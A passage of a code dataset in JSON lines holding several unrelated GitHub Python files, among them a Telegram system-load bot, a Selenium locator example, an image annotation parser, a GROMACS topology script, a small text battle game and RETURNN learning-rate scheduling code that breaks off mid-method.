get_status(message):\r\n cpu_percent = psutil.cpu_percent()\r\n memory = psutil.virtual_memory()\r\n mem_percent = memory.percent\r\n bot.reply_to(message, f\"CPU: {cpu_percent}%\\nОперативная память: {mem_percent}%\")\r\n\r\ndef monitor_status():\r\n while True:\r\n memory = psutil.virtual_memory()\r\n mem_percent = memory.percent\r\n cpu_percent = psutil.cpu_percent()\r\n\r\n if cpu_percent > ALERT_THRESHOLD or mem_percent > ALERT_THRESHOLD:\r\n bot.send_message(chat_id=OWNER_ID, text=f\"⚠️ Внимание! 
Высокая нагрузка:\\nCPU: {cpu_percent}%\\nОперативная память: {mem_percent}%\")\r\n\r\n time.sleep(ALERT_INTERVAL)\r\n\r\nif __name__ == '__main__':\r\n monitor_thread = threading.Thread(target=monitor_status)\r\n monitor_thread.start()\r\n bot.polling(none_stop=True)\r\n","repo_name":"SAJOC-a/tg-bot-pc-check","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29899631082","text":"from selenium import webdriver\n\nclass FindByXpath():\n\n def testMethod(self):\n driver = webdriver.Firefox()\n baseUrl = \"https://learn.letskodeit.com/p/practice\"\n\n driver.get(baseUrl)\n elementByXpath = driver.find_element_by_xpath(\"//*[@id='name']\")\n\n if elementByXpath is not None:\n print (\"We found an element by XPATH!\")\n\n elementByCSS = driver.find_element_by_css_selector(\"#displayed-text\")\n\n if elementByCSS is not None:\n print (\"We found an element by CSS!\")\n\n driver.quit()\n\n\nff = FindByXpath()\nff.testMethod()","repo_name":"bartekh21/mighty-python","sub_path":"FindByXpath.py","file_name":"FindByXpath.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32179930631","text":"#!/usr/bin/env python\n\nimport json\nimport math\nimport numpy\nfrom PIL import Image\n\n\nclass AnnotationData:\n def __init__(self, labels, image_data):\n self._labels = labels\n self._image_shape = image_data.shape[:2]\n\n # Create a dictionary for each label\n # Each dictionary will map object numbers to their data\n self._label_sets = [dict() for i in range(len(self._labels))]\n # Create layer for each label (this will hold all objects on one layer)\n self._label_single = [\n numpy.zeros(self._image_shape, dtype=bool)\n for i in range(len(self._labels))\n ]\n\n raw_annotation = numpy.bitwise_or(numpy.bitwise_or(\n image_data[:, :, 0].astype(numpy.uint32),\n image_data[:, :, 1].astype(numpy.uint32) << 8),\n image_data[:, :, 2].astype(numpy.uint32) << 16)\n\n ones = numpy.ones_like(raw_annotation, dtype=numpy.uint8)\n zeros = numpy.zeros_like(raw_annotation, dtype=numpy.uint8)\n\n unique_combinations = numpy.unique(raw_annotation)\n for combination in unique_combinations:\n # Decode combination into set of labels and objects.\n layers = _rec_separate_layers(\n combined_layers=combination,\n times_combined=math.ceil(math.log(len(self._labels), 2))\n )\n for layer in layers:\n object_mask = numpy.where(raw_annotation == combination, ones, zeros)\n\n if layer[1] in self._label_sets[layer[0]]:\n existing_mask = self._label_sets[layer[0]][layer[1]]\n object_mask = numpy.logical_or(object_mask, existing_mask)\n\n # Add object to dict\n self._label_sets[layer[0]][layer[1]] = object_mask\n # Append object to layer\n self._label_single[layer[0]] = numpy.logical_or(\n self._label_single[layer[0]], object_mask\n )\n\n def get_classes(self):\n \"\"\"Returns a count of objects in each class\n \n :return: A dictionary eg. {'tomato': 5, 'leaf': 3, 'stem': 4}\n \"\"\"\n dictionary = dict()\n for i, label in enumerate(self._labels):\n dictionary[label] = len(self._label_sets[i])\n return dictionary\n\n def get_mask(self, label_name, object_number=None):\n \"\"\"Returns a boolean mask\n \n :param label_name: the label to mask eg. 'tomato'\n :param object_number: optional object number\n :return: An array the same size as the image with 1 representing the\n object and 0 elsewhere. 
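# --- Editor's sketch (not part of the original record): the annotation
# decoder in this record un-packs layer/object pairs with an inverse Cantor
# pairing function; this round trip shows the forward encoding it inverts.
# The forward function is the standard textbook definition, not taken from
# the record.
import math

def cantor_pair(x: int, y: int) -> int:
    # Bijection between pairs of non-negative integers and single integers.
    return (x + y) * (x + y + 1) // 2 + y

def inverse_cantor_pair(z: int):
    w = math.floor((math.sqrt(8 * z + 1) - 1) / 2)
    t = (w * w + w) // 2
    y = int(z - t)
    return int(w - y), y

assert inverse_cantor_pair(cantor_pair(7, 3)) == (7, 3)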
If no object is specified, all objects\n with matching label will be masked as 1\n \"\"\"\n try:\n label_index = self._labels.index(label_name)\n except ValueError:\n return None\n\n if object_number is None:\n return self._label_single[label_index]\n else:\n try:\n return self._label_sets[label_index][object_number]\n except KeyError:\n return None\n\n\ndef _rec_separate_layers(combined_layers, times_combined, counter=0):\n unpacked = _inverse_cantor_pair(combined_layers)\n layers = []\n if counter < times_combined:\n layers.extend(_rec_separate_layers(unpacked[0], times_combined, counter + 1))\n layers.extend(_rec_separate_layers(unpacked[1], times_combined, counter + 1))\n else:\n if unpacked[0] != 0:\n layers.append(unpacked)\n return layers\n\n\ndef _inverse_cantor_pair(z):\n w = math.floor((math.sqrt(8*z+1)-1)/2)\n t = (math.pow(w, 2) + w)/2\n y = int(z - t)\n x = int(w - y)\n return x, y\n\n\ndef read(annotation_path, json_path):\n \"\"\"Parses a .json file to load annotation data from a .png file.\n \n :param annotation_path: The path to the annotation .png file\n :param json_path: The path to the .json file\n :return: an AnnotationData object containing the loaded data\n \"\"\"\n\n try:\n with open(json_path, 'r') as json_file:\n json_data = json.load(json_file)\n\n except IOError:\n print(\"Cannot find .json file\")\n return None\n\n try:\n image_data = numpy.array(Image.open(annotation_path))\n except IOError:\n print(\"Cannot find annotation file\")\n return None\n\n if \"labels\" not in json_data:\n print(\"Error parsing json file\")\n return None\n\n # else\n return AnnotationData(json_data[\"labels\"], image_data)\n","repo_name":"ReemHal/Python_annotation_tool","sub_path":"scripts/image_annotation_parser.py","file_name":"image_annotation_parser.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70054564327","text":"\"\"\"\nCalculates the skew-based distinctiveness (minus communciations words) for each\nstory across a range of roles and character rank groups, saving the results in a\nseries of .tsv files.\n\n@author: Hardik\n\"\"\"\n\nimport argparse\nimport csv\nimport logging\nimport os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], os.path.join('..', 'src')))\n\nfrom collections import defaultdict\nfrom multiprocessing import Process\nfrom nltk.stem import WordNetLemmatizer\n\nfrom aliases import AliasesManager\nfrom collocates import CollocatesManager\nfrom corpus import CorpusManager\nfrom distinctiveness import SkewDistinctivenessCalculator\nfrom ranks import RANK_GROUPS\nfrom role import ROLES\n\n\n# Configure logging\nlogging.basicConfig(format=\"%(levelname)s: [%(asctime)s] %(message)s\",\n\tlevel=logging.INFO)\n\n# Filepath to \"said\" words.\nSAID_DICT_PATH = \"../resources/said_dict.txt\"\n\n\n# Returns a set of \"said\" words, lemmatized.\ndef load_said_words():\n\twords = []\n\twith open(SAID_DICT_PATH) as f:\n\t\tfor line in f:\n\t\t\twords += [p.strip().replace(' ', '-') for p in line.split('\\t')]\n\n\tlemmatizer = WordNetLemmatizer()\n\n\t# Lemmatize and convert to set and add 'say'.\n\treturn set([lemmatizer.lemmatize(w) for w in words] + ['say'])\n\ndef main():\n\tparser_description = (\"Calculates the skew-based distinctiveness for each \"\n\t\t\"story across a range of roles and character rank groups, saving the \"\n\t\t\"results in a series of .tsv files.\")\n\tparser = 
argparse.ArgumentParser(description=parser_description)\n\n\tparser.add_argument('out_dirpath', help=\"Path to output directory\")\n\n\tparser.add_argument('n', help=\"# worker threads to spawn\", type=int)\n\t\n\targs = parser.parse_args()\n\n\t# Add None for considering all roles.\n\troles = [None] + ROLES\n\n\taliases_manager = AliasesManager()\n\tcollocates_manager = CollocatesManager()\n\tcorpus_manager = CorpusManager()\n\t\n\t# Get publication dates for all stories.\n\tdates = corpus_manager.get_dates()\n\t# Story Id's.\n\tsids = corpus_manager.get_ids(origin='gen')\n\n\t# Group parameter settings for each worker process.\n\tparam_groups, i = defaultdict(list), 0\n\tfor rg in RANK_GROUPS:\n\t\tfor role in roles:\n\t\t\tparam_groups[i % args.n].append((rg, role))\n\t\t\ti += 1\n\n\t# Create the output directory if it doesn't already exist.\n\tif not os.path.exists(args.out_dirpath):\n\t\tos.makedirs(args.out_dirpath)\n\n\tsaid_words = load_said_words()\n\n\tdef run_distinctiveness_calc(worker_name, params):\n\t\tfor rg, role in params:\n\t\t\trg_name, ranks = rg[0], rg[1]\n\n\t\t\trole_name = role.lower() if role else 'all'\n\t\t\tout_path = os.path.join(args.out_dirpath, '%s-%s.tsv' % (role_name,\n\t\t\t\trg_name.lower()))\n\n\t\t\tif role_name != 'all':\n\t\t\t\tcontinue\n\n\t\t\tif rg_name.lower() != 'all' and rg_name.lower() != 'top':\n\t\t\t\tcontinue\n\n\t\t\tlogging.info(worker_name + \": Processing... (Outputting to %s)\" %\n\t\t\t\tout_path)\n\t\t\n\t\t\tdistinct_calculator = SkewDistinctivenessCalculator(role=role,\n\t\t\t\tranks=ranks)\n\n\t\t\twith open(out_path, 'wb') as f:\n\t\t\t\twriter = csv.writer(f, delimiter='\\t', quotechar='\"')\n\n\t\t\t\t# Write header.\n\t\t\t\twriter.writerow(['STORY ID', 'PUB. DATE', 'GENRE',\n\t\t\t\t\t'DISTINCTIVENESS'])\n\n\t\t\t\tfor sid in sids:\n\t\t\t\t\tif not aliases_manager.saved(sid, tpe='character') or \\\n\t\t\t\t\t\tnot collocates_manager.saved(sid, tpe='character'):\n\t\t\t\t\t\tlogging.info(worker_name + \": Skipping %s...\" % sid)\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tgenre = (None if sid.startswith('000') else\n\t\t\t\t\t\tcorpus_manager.get_genre(sid))\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcollocates = collocates_manager.get(sid,\n\t\t\t\t\t\t\ttpe='character', role=role, ranks=ranks)\n\n\t\t\t\t\t\tcomm_collocates = [coll for coll in collocates\n\t\t\t\t\t\t\tif coll['token']['lemma'] not in said_words]\n\n\t\t\t\t\t\trow = [sid, dates[sid] if sid in dates else 'DNE',\n\t\t\t\t\t\t\tgenre if genre else 'DNE',\n\t\t\t\t\t\t\tdistinct_calculator.calc(collocates=comm_collocates)]\n\n\t\t\t\t\t\twriter.writerow(row)\n\n\t\t\t\t\texcept IndexError:\n\t\t\t\t\t\tlogging.info(worker_name + \": Skipping %s...\" % sid)\n\t\t\t\n\t\t\tlogging.info(worker_name + \": Finished!\")\t\n\t\n\tfor i, params in param_groups.iteritems():\n\t\tp = Process(target=run_distinctiveness_calc, args=(\"T%d\" % (i + 1),\n\t\t\tparams,))\n\t\tp.start()\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"rbudac/McGill-Characterization-Process","sub_path":"scripts/calc_skew_distinctiveness_minus_comm.py","file_name":"calc_skew_distinctiveness_minus_comm.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24647126280","text":"import sys\r\n\r\n#Função para encontrar numero da linha que contém o argumemnto desejado\r\ndef get_line(txt):\r\n file = open('topol.top', encoding='utf8')\r\n for line_num, value in enumerate(file, 1): #le todas as linhas e valores 
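# --- Editor's sketch (not part of the original record): the marker-based
# line-insertion pattern used by the topology script in this record, in
# generic form. The path and marker arguments are hypothetical.
def insert_after_marker(path: str, marker: str, new_text: str) -> None:
    # Read the file, splice `new_text` in after the first line containing
    # `marker`, then write everything back.
    with open(path, encoding='utf8') as fh:
        lines = fh.readlines()
    for i, line in enumerate(lines):
        if marker in line:
            lines.insert(i + 1, new_text)
            break
    with open(path, 'w', encoding='utf8') as fh:
        fh.writelines(lines)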
\r\n        if txt in value: # when 'txt' is found, return that line's number\r\n            return line_num\r\n\r\nif len(sys.argv) < 3:\r\n    print('ERROR: put lig and cof names without extension')\r\n\r\nelse:\r\n    # Arguments\r\n    lig = sys.argv[1]\r\n    cof = sys.argv[2]\r\n\r\n    # Markers used to find the line numbers where the .prm and .itp includes are added\r\n    x = '#include \"./charmm36-mar2019.ff/forcefield.itp\"'\r\n    y = '; Include Position restraint file'\r\n    z = 'Protein 1'\r\n\r\n    # Open topol.top -> read lines and insert the .prm includes\r\n    file = open('topol.top', 'r+', encoding='utf8')\r\n    line = file.readlines()\r\n    line.insert(get_line(x),f'\\n; Include ligand parameters\\n#include \"{lig}.prm\"\\n#include \"{cof}.prm\"\\n')\r\n    file.seek(0)\r\n    file.writelines(line)\r\n    \r\n    # Open topol.top -> read lines and insert the .itp includes\r\n    file = open('topol.top', 'r+', encoding='utf8')\r\n    line = file.readlines()\r\n    line.insert(get_line(y)+ 4,f'; Include ligand topology\\n#include \"{lig}.itp\"\\n#include \"{cof}.itp\"\\n\\n')\r\n    file.seek(0)\r\n    file.writelines(line)\r\n    \r\n    # Open topol.top -> read lines and append the final molecule counts\r\n    file = open('topol.top', 'r+', encoding='utf8')\r\n    line = file.readlines()\r\n    line.insert(get_line(z),f'\\n{lig} 1\\n{cof} 1')\r\n    file.seek(0)\r\n    file.writelines(line)\r\n","repo_name":"lbfederico/gromacs_scripts","sub_path":"Step_by_step/topol_lig_cof.py","file_name":"topol_lig_cof.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13300649895","text":"import random\nkasutaja = input(\"What is your name\")\n\nkontroll = True\nwhile kontroll == True:\n    relv = input(\"warrior, twosword, defender\")\n    turvis = input(\"light, medium, heavy\")\n    if (relv == \"warrior\" or relv == \"twosword\" or relv == \"defender\") and (turvis == \"light\" or turvis == \"medium\" or turvis == \"heavy\"):\n        kontroll = False\n    else:\n        print(\"please enter again\")\n    \nplayer = {\n    \"nimi\" : kasutaja,\n    \"elud\" : 50,\n    \"relv\" : relv,\n    \"turvis\" : turvis,\n    \"elu pott\" : 2\n    }\nDiablo = {\n    \"nimi\" : \"Diablo\",\n    \"elud\" : 1500,\n    \"relv\" : \"hell claws\",\n    \"turvis\" : \"dragon hide\",\n    \"maagia\" : \"shoves the opponent\"\n    }\n\nif turvis == \"light\":\n    armor = 4\nelif turvis == \"medium\":\n    armor = 8\nelif turvis == \"heavy\":\n    armor = 16\n    \ncombat = True\nwhile combat == True:\n    \"\"\"print (\"The player strikes\")\n    Diablo[\"elud\"] = Diablo[\"elud\"] - random.randint(0, 10)\n    print (\"Diablo strikes, brace yourself\")\n    player[\"elud\"] = player[\"elud\"] - random.randint(15, 25)\"\"\"\n    if player[\"relv\"] == \"warrior\":\n        dmg = random.randint(8, 14)\n    elif player[\"relv\"] == \"defender\":\n        dmg = random.randint(7,12)\n    elif player[\"relv\"] == \"twosword\":\n        dmg = random.randint(10, 20)\n        \n    if dmg >= 11: # the player attacks\n        Diablo[\"elud\"] = Diablo[\"elud\"] - dmg\n        print(Diablo[\"elud\"])\n    else:\n        print(\"Diablo didn't take damage\")\n        \n        \n    if random.randint(0, 20) >= armor: # Diablo attacks (note: reuses the player's damage roll as Diablo's damage)\n        player[\"elud\"] = player[\"elud\"] - dmg\n        print(player[\"elud\"])\n    else:\n        print(\"The player didn't take damage\")\n        \n        \n    if player[\"elud\"] < 0:\n        combat = False\n        print(\"YOU DIED!\")\n
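    # Win condition (assumed): the loop above only ended on the player's death, so\n    # Diablo's defeat was never detected; the victory message text is an assumption.\n    if Diablo[\"elud\"] <= 0:\n        combat = False\n        print(\"YOU WIN!\")\nprint(\"Game 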
over!\")","repo_name":"HenriTammo/Python","sub_path":"nädal2/mäng.py","file_name":"mäng.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7781980286","text":"#!/usr/bin/env python3\n\nimport json\nimport sys\n\nfrom jsonschema import validate, draft7_format_checker, ValidationError\n\n\ndef run(args):\n try:\n instance = json.load(args.instance)\n schema = json.load(args.schema)\n except json.decoder.JSONDecodeError as why:\n sys.stderr.write(f\"JSON decoding error: {why}\\n\")\n sys.exit(1)\n try:\n validate(instance, schema, format_checker=draft7_format_checker)\n except ValidationError as why:\n sys.stderr.write(f\"{why}\\n\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Validate a JSON file.\")\n parser.add_argument(\"schema\", type=open, help=\"The JSON schema file\")\n parser.add_argument(\"instance\", type=open, help=\"The JSON instance file\")\n try:\n args = parser.parse_args()\n except Exception as why:\n sys.stderr.write(f\"{why}\\n\")\n sys.exit(1)\n run(args)\n","repo_name":"ietf-github-services/issue-summary","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41988859564","text":"from textwrap import dedent\n\nimport pytest\nfrom libcst import parse_module\nfrom libcst.metadata import FunctionScope\n\nfrom snakepack.analyzers.python.literals import LiteralDuplicationAnalyzer\nfrom snakepack.analyzers.python.scope import ScopeAnalyzer\nfrom snakepack.assets.python import PythonModuleCst, PythonModule\n\n\n@pytest.mark.skip\nclass LiteralDuplicationAnalyzerIntegrationTest:\n def test_analyze(self):\n content = PythonModuleCst(\n cst=parse_module(\n dedent(\n \"\"\"\n a = 'foo'\n b: str = 'foo'\n b += 'invalidate'\n c = 'foo'\n c += ''\n d = 'foo'\n d: str = 'foo'\n e = 'foo'\n e = 'not anymore'\n \n x = 'bar'\n y('bar', 'bar', 'bar')\n \"\"\"\n )\n )\n )\n module = PythonModule(\n full_name='a',\n content=content,\n source=None\n )\n\n analyzer = LiteralDuplicationAnalyzer()\n analysis = analyzer.analyse(module)\n\n foo_node = content.cst.body[0].body[0].value\n foo_assignments = analysis.get_preceding_assignments(module, foo_node)\n\n assert len(foo_assignments) == 1\n assert 'a' in foo_assignments\n assert len(foo_assignments['a']) == 1\n\n bar_node = content.cst.body[9].body[0].value\n bar_assignments = analysis.get_preceding_assignments(module, bar_node)\n\n assert len(bar_assignments) == 1\n assert 'x' in bar_assignments\n assert len(bar_assignments['x']) == 1\n","repo_name":"jochenvdv/snakepack","sub_path":"tests/integration/analyzers/python/test_literals.py","file_name":"test_literals.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3009915015","text":"\"\"\"\nProvides the learning rate scheduling logic.\nThe base class is :class:`LearningRateControl`.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport typing\nfrom returnn.util.basic import better_repr, simple_obj_repr, ObjAsDict, unicode\nfrom returnn.log import log\nimport numpy\n\n\nclass LearningRateControl(object):\n \"\"\"\n Base class for learning rate control / scheduling.\n \"\"\"\n\n need_error_info = True\n\n class EpochData:\n \"\"\"\n Encapsulates all relevant 
information for one epoch,\n needed to perform learning rate scheduling,\n such as the individual scores (cv or train; cross-entropy or frame-error or whatever).\n \"\"\"\n\n # Need to keep the non-PEP8 name for compatibility, because we store the repr of the object.\n # noinspection PyPep8Naming\n def __init__(self, learningRate, error=None):\n \"\"\"\n :type learningRate: float\n :type error: dict[str,float] | None\n \"\"\"\n self.learning_rate = learningRate\n if isinstance(error, float): # Old format.\n error = {\"old_format_score\": error}\n if error is None:\n error = {}\n self.error = error\n\n def __repr__(self):\n # This is being used for serialization, and we want some forward/backward compatibility,\n # so we should try to keep this consistent.\n return \"EpochData(learningRate=%s, error=%s)\" % (better_repr(self.learning_rate), better_repr(self.error))\n\n @classmethod\n def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n return {\n \"default_learning_rate\": config.float(\"learning_rate\", 1.0),\n \"min_learning_rate\": config.float(\"min_learning_rate\", 0.0),\n \"default_learning_rates\": config.typed_value(\"learning_rates\") or config.float_list(\"learning_rates\"),\n \"error_measure_key\": (\n config.typed_value(\"learning_rate_control_error_measure\")\n or config.value(\"learning_rate_control_error_measure\", None)\n ),\n \"relative_error_also_relative_to_learning_rate\": (\n config.bool(\"learning_rate_control_relative_error_relative_lr\", False)\n ),\n \"min_num_epochs_per_new_learning_rate\": config.int(\"learning_rate_control_min_num_epochs_per_new_lr\", 0),\n \"relative_error_div_by_old\": config.bool(\"newbob_relative_error_div_by_old\", False),\n \"learning_rate_decay\": config.typed_value(\n \"learning_rate_decay\", config.opt_typed_value(\"newbob_learning_rate_decay\", 0.5)\n ),\n \"learning_rate_growth\": config.typed_value(\n \"learning_rate_growth\", config.opt_typed_value(\"newbob_learning_rate_growth\", 1.0)\n ),\n \"filename\": config.value(\"learning_rate_file\", None),\n }\n\n @classmethod\n def load_initial_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: LearningRateControl\n \"\"\"\n kwargs = cls.load_initial_kwargs_from_config(config)\n return cls(**kwargs)\n\n def __init__(\n self,\n default_learning_rate,\n min_learning_rate=0.0,\n default_learning_rates=None,\n error_measure_key=None,\n relative_error_also_relative_to_learning_rate=False,\n min_num_epochs_per_new_learning_rate=0,\n relative_error_div_by_old=False,\n learning_rate_decay=1.0,\n learning_rate_growth=1.0,\n filename=None,\n ):\n \"\"\"\n :param float default_learning_rate: default learning rate. 
usually for epoch 1\n :param list[float] | dict[int,float] default_learning_rates: learning rates\n :param str|list[str]|None error_measure_key: for get_epoch_error_value() the key for EpochData.error\n which is a dict\n :param int min_num_epochs_per_new_learning_rate: if the lr was recently updated, use it for at least N epochs\n :param bool relative_error_div_by_old: if True, compute relative error as (new - old) / old.\n :param float|(float)->float learning_rate_decay:\n :param float|(float)->float learning_rate_growth:\n :param str filename: load from and save to file\n \"\"\"\n self.epoch_data = {} # type: typing.Dict[int,LearningRateControl.EpochData]\n self.filename = filename\n if filename:\n if os.path.exists(filename):\n print(\"Learning-rate-control: loading file %s\" % filename, file=log.v4)\n # Load now, such that default_learning_rates is correctly handled.\n self.load()\n else:\n print(\"Learning-rate-control: file %s does not exist yet\" % filename, file=log.v4)\n else:\n print(\n \"Learning-rate-control: no file specified, not saving history (no proper restart possible)\", file=log.v4\n )\n self.default_learning_rate = default_learning_rate\n self.min_learning_rate = min_learning_rate\n if default_learning_rates:\n if isinstance(default_learning_rates, list):\n default_learning_rates = {i + 1: v for (i, v) in enumerate(default_learning_rates)}\n if isinstance(default_learning_rates, (str, unicode)):\n default_learning_rates = eval(default_learning_rates)\n assert isinstance(default_learning_rates, dict)\n for epoch, v in default_learning_rates.items():\n self.set_default_learning_rate_for_epoch(epoch, v)\n self.default_learning_rates = default_learning_rates\n self.error_measure_key = error_measure_key\n self.relative_error_also_relative_to_learning_rate = relative_error_also_relative_to_learning_rate\n self.min_num_epochs_per_new_learning_rate = min_num_epochs_per_new_learning_rate\n self.relative_error_div_by_old = relative_error_div_by_old\n self.learning_rate_decay = learning_rate_decay\n self.learning_rate_growth = learning_rate_growth\n\n __repr__ = simple_obj_repr\n\n def __str__(self):\n epochs = sorted(self.epoch_data.keys())\n if len(epochs) > 6:\n epoch_str = \", \".join(\n [\"%i: %s\" % (epoch, self.epoch_data[epoch]) for epoch in epochs[:3]]\n + [\"...\"]\n + [\"%i: %s\" % (epoch, self.epoch_data[epoch]) for epoch in epochs[-3:]]\n )\n else:\n epoch_str = \", \".join([\"%i: %s\" % (epoch, self.epoch_data[epoch]) for epoch in epochs])\n return \"%r, epoch data: %s, error key: %s\" % (self, epoch_str, self.get_error_key(epoch=1))\n\n @staticmethod\n def _calc_learning_rate_update(learning_rate, update):\n \"\"\"\n :param float learning_rate:\n :param None|float|(float)->float update: factor, or generic func\n :return: lr with update applied (e.g. 
decay factor)\n :rtype: float\n \"\"\"\n if update is None:\n return learning_rate\n if isinstance(update, float):\n return learning_rate * update\n assert callable(update)\n learning_rate = update(learning_rate)\n assert isinstance(learning_rate, float)\n return learning_rate\n\n def _calc_learning_rate_decay(self, learning_rate):\n \"\"\"\n :param float learning_rate:\n :return: lr with decay applied\n :rtype: float\n \"\"\"\n return self._calc_learning_rate_update(learning_rate, update=self.learning_rate_decay)\n\n def _calc_learning_rate_growth(self, learning_rate):\n \"\"\"\n :param float learning_rate:\n :return: lr with growth applied\n :rtype: float\n \"\"\"\n return self._calc_learning_rate_update(learning_rate, update=self.learning_rate_growth)\n\n def calc_learning_rate_decay_or_grow(self, learning_rate, decay, grow=None):\n \"\"\"\n :param float learning_rate:\n :param bool decay:\n :param bool|None grow: default is not decay\n :return: lr with decay or growth applied\n :rtype: float\n \"\"\"\n assert isinstance(decay, bool)\n if grow is None:\n grow = not decay\n assert isinstance(grow, bool)\n assert not (grow and decay) # not sure if this makes sense...\n if decay:\n learning_rate = self._calc_learning_rate_decay(learning_rate)\n if learning_rate < self.min_learning_rate:\n learning_rate = self.min_learning_rate\n if grow:\n learning_rate = self._calc_learning_rate_growth(learning_rate)\n return learning_rate\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n raise NotImplementedError\n\n def calc_new_learning_rate_for_epoch(self, epoch):\n \"\"\"\n :param int epoch:\n :return: new learning rate for this epoch\n :rtype: float\n \"\"\"\n if self.min_num_epochs_per_new_learning_rate > 1:\n last_lrs = [\n self.epoch_data[e].learning_rate\n for e in self._last_epochs_for_epoch(epoch, num_epochs=self.min_num_epochs_per_new_learning_rate)\n ]\n if len(set(last_lrs)) >= 2 or 0 < len(last_lrs) < self.min_num_epochs_per_new_learning_rate:\n return last_lrs[-1]\n learning_rate = self.calc_learning_rate_for_epoch(epoch)\n return learning_rate\n\n def _last_epochs_for_epoch(self, epoch, num_epochs):\n \"\"\"\n :param int epoch:\n :param int num_epochs:\n :return: last N epochs where we have some epoch data\n :rtype: list[int]\n \"\"\"\n last_epochs = sorted([e for e in self.epoch_data.keys() if e < epoch])\n if not last_epochs:\n return []\n last_epochs = last_epochs[-num_epochs:]\n return last_epochs\n\n def get_learning_rate_for_epoch(self, epoch):\n \"\"\"\n :type epoch: int\n :rtype: float\n \"\"\"\n assert epoch >= 1\n if epoch in self.epoch_data:\n return self.epoch_data[epoch].learning_rate\n learning_rate = self.calc_new_learning_rate_for_epoch(epoch)\n self.set_default_learning_rate_for_epoch(epoch, learning_rate)\n return learning_rate\n\n def set_default_learning_rate_for_epoch(self, epoch, learning_rate):\n \"\"\"\n :type epoch: int\n :type learning_rate: float\n \"\"\"\n if epoch in self.epoch_data:\n if not self.epoch_data[epoch].learning_rate:\n self.epoch_data[epoch].learning_rate = learning_rate\n else:\n self.epoch_data[epoch] = self.EpochData(learning_rate)\n\n def get_last_epoch(self, epoch):\n \"\"\"\n :param int epoch:\n :return: last epoch before ``epoch`` where we have some epoch data\n :rtype: int\n \"\"\"\n epochs = sorted([e for e in self.epoch_data.keys() if e < epoch])\n if not epochs:\n return None\n return epochs[-1]\n\n def get_most_recent_learning_rate(self, epoch, 
exclude_current=True):\n        \"\"\"\n        :param int epoch:\n        :param bool exclude_current:\n        :return: most recent learning rate before or including ``epoch``\n        :rtype: float\n        \"\"\"\n        for e, data in reversed(sorted(self.epoch_data.items())):\n            assert isinstance(data, LearningRateControl.EpochData)\n            if e > epoch:\n                continue\n            if exclude_current and e == epoch:\n                continue\n            if data.learning_rate is None:\n                continue\n            return data.learning_rate\n        return self.default_learning_rate\n\n    def calc_relative_error(self, old_epoch, new_epoch):\n        \"\"\"\n        :param int old_epoch:\n        :param int new_epoch:\n        :return: relative error between old epoch and new epoch\n        :rtype: float\n        \"\"\"\n        old_key, old_error = self.get_epoch_error_key_value(old_epoch)\n        new_key, new_error = self.get_epoch_error_key_value(new_epoch)\n        if old_error is None or new_error is None:\n            return None\n        if old_key != new_key:\n            return None\n        if self.relative_error_div_by_old:\n            relative_error = (new_error - old_error) / abs(old_error)\n        else:\n            relative_error = (new_error - old_error) / abs(new_error)\n        if self.relative_error_also_relative_to_learning_rate:\n            learning_rate = self.get_most_recent_learning_rate(new_epoch, exclude_current=False)\n            if learning_rate > 0:\n                # If the learning rate is lower than the initial learning rate,\n                # the relative error is also expected to be lower, so correct for that here.\n                relative_error /= learning_rate / self.default_learning_rate\n        return relative_error\n\n    def set_epoch_error(self, epoch, error):\n        \"\"\"\n        :type epoch: int\n        :type error: dict[str,float|dict[str,float]]\n        \"\"\"\n        if epoch not in self.epoch_data:\n            print(\"Learning rate not set for epoch %i. Assuming default.\" % epoch, file=log.v4)\n            self.get_learning_rate_for_epoch(epoch) # This will set it.\n        assert isinstance(error, dict)\n        error = error.copy()\n        for k, v in list(error.items()):\n            if isinstance(v, dict): # like error = {\"dev_score\": {\"cost:output1\": .., \"cost:output2\": ...}, ...}\n                del error[k]\n                if len(v) == 1:\n                    error[k] = list(v.values())[0]\n                    continue\n                for k1, v1 in v.items():\n                    if \":\" in k1:\n                        k1 = k1[k1.index(\":\") + 1 :]\n                    error[k + \"_\" + k1] = v1\n        for v in error.values():\n            assert isinstance(v, float)\n        self.epoch_data[epoch].error.update(error)\n        if epoch == 1:\n            print(\"Learning-rate-control: error key %r from %r\" % (self.get_error_key(epoch), error), file=log.v4)\n\n    def get_error_key(self, epoch):\n        \"\"\"\n        :param int epoch:\n        :return: the key under which to look in scores/errors, for this epoch\n        :rtype: str\n        \"\"\"\n        if epoch not in self.epoch_data:\n            if isinstance(self.error_measure_key, list):\n                return self.error_measure_key[0]\n            assert isinstance(self.error_measure_key, (str, type(None)))\n            return self.error_measure_key\n        epoch_data = self.epoch_data[epoch]\n        if not epoch_data.error:\n            return None\n        if len(epoch_data.error) == 1 and \"old_format_score\" in epoch_data.error:\n            return 